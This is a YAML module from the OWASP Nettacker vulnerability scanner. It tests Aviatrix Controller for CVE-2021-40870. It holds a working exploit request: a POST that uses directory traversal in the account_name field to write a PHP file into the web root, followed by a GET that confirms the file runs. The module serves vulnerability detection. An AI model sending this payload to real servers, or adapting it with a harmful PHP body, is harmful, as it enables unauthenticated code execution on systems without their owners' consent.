Nettacker/nettacker/modules/vuln/aviatrix_cve_2021_40870.yaml

82 lines
2.2 KiB
YAML

info:
name: aviatrix_cve_2021_40870_vuln
author: OWASP Nettacker Team
severity: 9
description: Aviatrix Controller 6.x before 6.5-1804.1922. Unrestricted upload of a file with a dangerous type is possible, which allows an unauthenticated user to execute arbitrary code via directory traversal.
reference:
- https://wearetradecraft.com/advisories/tc-2021-0002/
- https://nvd.nist.gov/vuln/detail/CVE-2021-40870
profiles:
- vuln
- http
- critical_severity
- cve2021
- cve
- aviatrix
- rce
payloads:
- library: http
steps:
- method: post
timeout: 3
headers:
User-Agent: "{user_agent}"
Host: "{target}"
Content-Type: application/x-www-form-urlencoded
allow_redirects: false
ssl: false
url:
nettacker_fuzzer:
input_format: "{{schema}}://{target}:{{ports}}/v1/backend1"
prefix: ""
suffix: ""
interceptors:
data:
schema:
- "http"
- "https"
ports:
- 80
- 443
data: CID=x&action=set_metric_gw_selections&account_name=/../../../var/www/php/random_string1.php&data=NETTACKER<?php phpinfo()?>
response:
condition_type: and
conditions:
status_code:
regex: '200'
reverse: false
- method: get
timeout: 3
headers:
User-Agent: "{user_agent}"
Host: "{target}"
Content-Type: application/x-www-form-urlencoded
allow_redirects: false
ssl: false
url:
nettacker_fuzzer:
input_format: "{{schema}}://{target}:{{ports}}/v1/random_string1.php"
prefix: ""
suffix: ""
interceptors:
data:
schema:
- "http"
- "https"
ports:
- 80
- 443
response:
condition_type: and
conditions:
status_code:
regex: '200'
reverse: false
content:
regex: NETTACKER
reverse: false